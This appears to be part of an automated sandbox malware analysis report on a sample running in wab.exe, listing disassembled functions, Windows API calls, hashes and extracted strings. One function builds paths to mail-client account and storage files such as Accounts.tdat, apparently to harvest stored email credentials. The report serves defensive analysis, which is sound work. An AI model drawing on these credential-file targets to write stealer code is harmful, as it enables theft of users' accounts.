                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                          • String ID:
                                          • API String ID: 1324828854-0
                                          • Opcode ID: f00452924bfc56d2d026ca7a3e4d1a97e6fa6863fedf6958e9ad42ccc897aa7c
                                          • Instruction ID: a17f393415f7cd131ea0348f38e9d47ad07b647b8bdc2e710c4457a6b1ca1153
                                          • Opcode Fuzzy Hash: f00452924bfc56d2d026ca7a3e4d1a97e6fa6863fedf6958e9ad42ccc897aa7c
                                          • Instruction Fuzzy Hash: B151B571E00B89AFDB11CFA4C895ADEBBF8EF0D300F24461AE959E7291D7309941CB65

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 415 22b23370-22b233b5 call 22b23330 call 22b237a7 420 22b23416-22b23419 415->420 421 22b233b7-22b233c9 415->421 422 22b2341b-22b23428 call 22b23790 420->422 423 22b23439-22b23442 420->423 421->423 424 22b233cb 421->424 427 22b2342d-22b23436 call 22b23330 422->427 426 22b233d0-22b233e7 424->426 428 22b233e9-22b233f7 call 22b23740 426->428 429 22b233fd 426->429 427->423 437 22b233f9 428->437 438 22b2340d-22b23414 428->438 432 22b23400-22b23405 429->432 432->426 435 22b23407-22b23409 432->435 435->423 436 22b2340b 435->436 436->427 439 22b23443-22b2344c 437->439 440 22b233fb 437->440 438->427 441 22b23486-22b23496 call 22b23774 439->441 442 22b2344e-22b23455 439->442 440->432 447 22b234aa-22b234c6 call 22b23330 call 22b23758 441->447 448 22b23498-22b234a7 call 22b23790 441->448 442->441 444 22b23457-22b23466 call 22b2bbe0 442->444 452 22b23483 444->452 453 22b23468-22b23480 444->453 448->447 452->441 453->452
                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 22B2339B
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 22B233A3
                                          • _ValidateLocalCookies.LIBCMT ref: 22B23431
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 22B2345C
                                          • _ValidateLocalCookies.LIBCMT ref: 22B234B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1170836740-1018135373
                                          • Opcode ID: 664312ecb8712924659b06d3763158fe6ec283daeb76120891d738af50f48e4c
                                          • Instruction ID: 92d087a593bcf69f38485e0ccaac7dbd5b68afaa952a629a247e63ea34d37ddb
                                          • Opcode Fuzzy Hash: 664312ecb8712924659b06d3763158fe6ec283daeb76120891d738af50f48e4c
                                          • Instruction Fuzzy Hash: 6041B234E007499BCF01CF68C984A9EBBB5EF49328F148396E92D9F261D735DA05CB91

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 22B29221: _free.LIBCMT ref: 22B2924A
                                          • _free.LIBCMT ref: 22B292AB
                                            • Part of subcall function 22B2571E: RtlFreeHeap.NTDLL(00000000,00000000,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?), ref: 22B25734
                                            • Part of subcall function 22B2571E: GetLastError.KERNEL32(?,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?,?), ref: 22B25746
                                          • _free.LIBCMT ref: 22B292B6
                                          • _free.LIBCMT ref: 22B292C1
                                          • _free.LIBCMT ref: 22B29315
                                          • _free.LIBCMT ref: 22B29320
                                          • _free.LIBCMT ref: 22B2932B
                                          • _free.LIBCMT ref: 22B29336
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 026839ccbc00445129a504a0200aef8c2cd015657932c49851fd76086813fad4
                                          • Instruction ID: 64b032497846d4e9aa6d7fe1a1fd18e7c7e8dc9db0ed995b0e8284289e4be564
                                          • Opcode Fuzzy Hash: 026839ccbc00445129a504a0200aef8c2cd015657932c49851fd76086813fad4
                                          • Instruction Fuzzy Hash: 95118E31980F18FADB30EBB0DC55FCB7B9DAF1C700F404A24A6DDB60A2DA64B5048751
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,22B26FFD,00000000,?,?,?,22B28A72,?,?,00000100), ref: 22B2887B
                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,22B28A72,?,?,00000100,5EFC4D8B,?,?), ref: 22B28901
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 22B289FB
                                          • __freea.LIBCMT ref: 22B28A08
                                            • Part of subcall function 22B256D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22B25702
                                          • __freea.LIBCMT ref: 22B28A11
                                          • __freea.LIBCMT ref: 22B28A36
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                          • String ID:
                                          • API String ID: 1414292761-0
                                          • Opcode ID: 77a50273c3f7b6a63b231a547f14644f489c94a4ef082a4890a2aa9edac61a87
                                          • Instruction ID: b54a4ef3ff370296953d33d0cd9f53b76be9e712b4ffa39b3c058cfea10fde00
                                          • Opcode Fuzzy Hash: 77a50273c3f7b6a63b231a547f14644f489c94a4ef082a4890a2aa9edac61a87
                                          • Instruction Fuzzy Hash: C651DF72610B16ABEF15CE60CD40FAB37AAEB45754F514729FE1CEA150EB34EC50C6A0
                                          APIs
                                          • _strlen.LIBCMT ref: 22B21607
                                          • _strcat.LIBCMT ref: 22B2161D
                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,22B2190E,?,?,00000000,?,00000000), ref: 22B21643
                                          • lstrcatW.KERNEL32(?,?), ref: 22B2165A
                                          • lstrlenW.KERNEL32(?,?,?,?,?,22B2190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 22B21661
                                          • lstrcatW.KERNEL32(00001008,?), ref: 22B21686
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: lstrcatlstrlen$_strcat_strlen
                                          • String ID:
                                          • API String ID: 1922816806-0
                                          • Opcode ID: a9da317746dc68c714da88bd430780eca084b26e180bde70ccbae4340bff6934
                                          • Instruction ID: c1b21d7b96e259e561e6f7566d9f316af9dc1eddaac60960f46a3875d12dbf15
                                          • Opcode Fuzzy Hash: a9da317746dc68c714da88bd430780eca084b26e180bde70ccbae4340bff6934
                                          • Instruction Fuzzy Hash: CE21C836900704ABDB05DF94DC80EEE77B8EF8C710F24451BE908AB155DF74A54187A5
                                          APIs
                                          • lstrcatW.KERNEL32(?,?), ref: 22B21038
                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 22B2104B
                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 22B21061
                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 22B21075
                                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 22B21090
                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 22B210B8
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: lstrlen$AttributesFilelstrcat
                                          • String ID:
                                          • API String ID: 3594823470-0
                                          • Opcode ID: fb69c13a7ea29a0b968c9602899eec29869d5bb24d79b294bdf87e3ad8fb3f22
                                          • Instruction ID: 6d35b4b74d1ca5af77a80f41d73ef556e8834d8f6f4fd214085d30fda030259c
                                          • Opcode Fuzzy Hash: fb69c13a7ea29a0b968c9602899eec29869d5bb24d79b294bdf87e3ad8fb3f22
                                          • Instruction Fuzzy Hash: D021A1359107199BCF20DFA0DD58EDB3768EF88324F104796E959A31B2DA319A86CB40
                                          APIs
                                          • GetLastError.KERNEL32(?,?,22B23518,22B223F1,22B21F17), ref: 22B23864
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 22B23872
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 22B2388B
                                          • SetLastError.KERNEL32(00000000,?,22B23518,22B223F1,22B21F17), ref: 22B238DD
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 1e5ad51895a237f26d4324228364d503d345d6e827b2169cd55b05ae8920d959
                                          • Instruction ID: 66b0cf10a3415e4985c8ca409090863240402f438c26540a3d5d1882c633d548
                                          • Opcode Fuzzy Hash: 1e5ad51895a237f26d4324228364d503d345d6e827b2169cd55b05ae8920d959
                                          • Instruction Fuzzy Hash: E6014C33A08F115EF20599796DC8B4B2794DF597B4B20033AF918DE0F5EF2958018350
                                          APIs
                                          • GetLastError.KERNEL32(?,?,22B26C6C), ref: 22B25AFA
                                          • _free.LIBCMT ref: 22B25B2D
                                          • _free.LIBCMT ref: 22B25B55
                                          • SetLastError.KERNEL32(00000000,?,?,22B26C6C), ref: 22B25B62
                                          • SetLastError.KERNEL32(00000000,?,?,22B26C6C), ref: 22B25B6E
                                          • _abort.LIBCMT ref: 22B25B74
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_free$_abort
                                          • String ID:
                                          • API String ID: 3160817290-0
                                          • Opcode ID: 5713554d2cb5961859f3e904d18d532025c6c34ace37b32a4e712e23ef1a9c1d
                                          • Instruction ID: ce3aaa15ac8c755392739f313e7b6601a8b1ac1b8a15ee712c438e19fcea6948
                                          • Opcode Fuzzy Hash: 5713554d2cb5961859f3e904d18d532025c6c34ace37b32a4e712e23ef1a9c1d
                                          • Instruction Fuzzy Hash: 3CF0F971584F0167D20EEA345D6CF0F2629CFD96B1F110315FD1CA71A4EE2888024364
                                          APIs
                                            • Part of subcall function 22B21E89: lstrlenW.KERNEL32(?,?,?,?,?,22B210DF,?,?,?,00000000), ref: 22B21E9A
                                            • Part of subcall function 22B21E89: lstrcatW.KERNEL32(?,?), ref: 22B21EAC
                                            • Part of subcall function 22B21E89: lstrlenW.KERNEL32(?,?,22B210DF,?,?,?,00000000), ref: 22B21EB3
                                            • Part of subcall function 22B21E89: lstrlenW.KERNEL32(?,?,22B210DF,?,?,?,00000000), ref: 22B21EC8
                                            • Part of subcall function 22B21E89: lstrcatW.KERNEL32(?,22B210DF), ref: 22B21ED3
                                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 22B2122A
                                            • Part of subcall function 22B2173A: _strlen.LIBCMT ref: 22B21855
                                            • Part of subcall function 22B2173A: _strlen.LIBCMT ref: 22B21869
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                          • API String ID: 4036392271-1520055953
                                          • Opcode ID: 7a0c1786c7bab5841dc5b5d82d2b02f644ccfaa5c25deef202683771162f700c
                                          • Instruction ID: dcfec023b343a6ca9315efcf738941d1aaed2fb8e76a03c9d7b103f192923610
                                          • Opcode Fuzzy Hash: 7a0c1786c7bab5841dc5b5d82d2b02f644ccfaa5c25deef202683771162f700c
                                          • Instruction Fuzzy Hash: 4321C379E207086AEB10D7A4EC81FEE7339EF94714F000646F608EB1F1EAB11D818759
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,22B24AEA,?,?,22B24A8A,?,22B32238,0000000C,22B24BBD,00000000,00000000), ref: 22B24B59
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 22B24B6C
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,22B24AEA,?,?,22B24A8A,?,22B32238,0000000C,22B24BBD,00000000,00000000,?,22B22082), ref: 22B24B8F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: 86d5c2aee0bf31d192b68a8d48146ffd1438467590aa18cb69fdb0ba5f964e29
                                          • Instruction ID: 9b0d20aacbdf0da8b516d724becb26185dcd68c4bfd66c98ce2a291638f5a3ce
                                          • Opcode Fuzzy Hash: 86d5c2aee0bf31d192b68a8d48146ffd1438467590aa18cb69fdb0ba5f964e29
                                          • Instruction Fuzzy Hash: 34F08C35A40719ABDB019BA0C81CF9EBFB9EF08291F010665FD09A7164DB348941CA90
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 22B2715C
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 22B2717F
                                            • Part of subcall function 22B256D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22B25702
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 22B271A5
                                          • _free.LIBCMT ref: 22B271B8
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 22B271C7
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                          • String ID:
                                          • API String ID: 336800556-0
                                          APIs
                                          • GetLastError.KERNEL32(00000000,?,00000000,22B2636D,22B25713,00000000,?,22B22249,?,?,22B21D66,00000000,?,?,00000000), ref: 22B25B7F
                                          • _free.LIBCMT ref: 22B25BB4
                                          • _free.LIBCMT ref: 22B25BDB
                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22B25BE8
                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22B25BF1
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_free
                                          • String ID:
                                          • API String ID: 3170660625-0
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,?,?,22B210DF,?,?,?,00000000), ref: 22B21E9A
                                          • lstrcatW.KERNEL32(?,?), ref: 22B21EAC
                                          • lstrlenW.KERNEL32(?,?,22B210DF,?,?,?,00000000), ref: 22B21EB3
                                          • lstrlenW.KERNEL32(?,?,22B210DF,?,?,?,00000000), ref: 22B21EC8
                                          • lstrcatW.KERNEL32(?,22B210DF), ref: 22B21ED3
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: lstrlen$lstrcat
                                          • String ID:
                                          • API String ID: 493641738-0
                                          APIs
                                          • _free.LIBCMT ref: 22B291D0
                                            • Part of subcall function 22B2571E: RtlFreeHeap.NTDLL(00000000,00000000,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?), ref: 22B25734
                                            • Part of subcall function 22B2571E: GetLastError.KERNEL32(?,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?,?), ref: 22B25746
                                          • _free.LIBCMT ref: 22B291E2
                                          • _free.LIBCMT ref: 22B291F4
                                          • _free.LIBCMT ref: 22B29206
                                          • _free.LIBCMT ref: 22B29218
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          APIs
                                          • _free.LIBCMT ref: 22B2536F
                                            • Part of subcall function 22B2571E: RtlFreeHeap.NTDLL(00000000,00000000,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?), ref: 22B25734
                                            • Part of subcall function 22B2571E: GetLastError.KERNEL32(?,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?,?), ref: 22B25746
                                          • _free.LIBCMT ref: 22B25381
                                          • _free.LIBCMT ref: 22B25394
                                          • _free.LIBCMT ref: 22B253A5
                                          • _free.LIBCMT ref: 22B253B6
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 22B24C1D
                                          • _free.LIBCMT ref: 22B24CE8
                                          • _free.LIBCMT ref: 22B24CF2
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: _free$FileModuleName
                                          • String ID: C:\Program Files (x86)\windows mail\wab.exe
                                          • API String ID: 2506810119-3377118234
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,22B26FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 22B28731
                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 22B287BA
                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 22B287CC
                                          • __freea.LIBCMT ref: 22B287D5
                                            • Part of subcall function 22B256D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22B25702
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                          • String ID:
                                          • API String ID: 2652629310-0
                                          APIs
                                          • GetModuleHandleA.KERNEL32(22B2C7DD), ref: 22B2C7E6
                                          • GetModuleHandleA.KERNEL32(?,22B2C7DD), ref: 22B2C838
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 22B2C860
                                            • Part of subcall function 22B2C803: GetProcAddress.KERNEL32(00000000,22B2C7F4), ref: 22B2C804
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID:
                                          • API String ID: 1646373207-0
                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,22B21D66,00000000,00000000,?,22B25C88,22B21D66,00000000,00000000,00000000,?,22B25E85,00000006,FlsSetValue), ref: 22B25D13
                                          • GetLastError.KERNEL32(?,22B25C88,22B21D66,00000000,00000000,00000000,?,22B25E85,00000006,FlsSetValue,22B2E190,FlsSetValue,00000000,00000364,?,22B25BC8), ref: 22B25D1F
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,22B25C88,22B21D66,00000000,00000000,00000000,?,22B25E85,00000006,FlsSetValue,22B2E190,FlsSetValue,00000000), ref: 22B25D2D
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID:
                                          • API String ID: 3177248105-0
                                          APIs
                                          • _free.LIBCMT ref: 22B2655C
                                            • Part of subcall function 22B262BC: IsProcessorFeaturePresent.KERNEL32(00000017,22B262AB,00000000,?,?,?,?,00000016,?,?,22B262B8,00000000,00000000,00000000,00000000,00000000), ref: 22B262BE
                                            • Part of subcall function 22B262BC: GetCurrentProcess.KERNEL32(C0000417), ref: 22B262E0
                                            • Part of subcall function 22B262BC: TerminateProcess.KERNEL32(00000000), ref: 22B262E7
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                          • String ID: *?$.
                                          • API String ID: 2667617558-3972193922
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID: : $Se.
                                          • API String ID: 4218353326-4089948878
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 22B22903
                                            • Part of subcall function 22B235D2: RaiseException.KERNEL32(?,?,?,22B22925,00000000,00000000,00000000,?,?,?,?,?,22B22925,?,22B321B8), ref: 22B23632
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 22B22920
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw$ExceptionRaise
                                          • String ID: Unknown exception
                                          • API String ID: 3476068407-410509341

                                          Execution Graph

                                          Execution Coverage:6.7%
                                          Dynamic/Decrypted Code Coverage:9.2%
                                          Signature Coverage:1.5%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:101
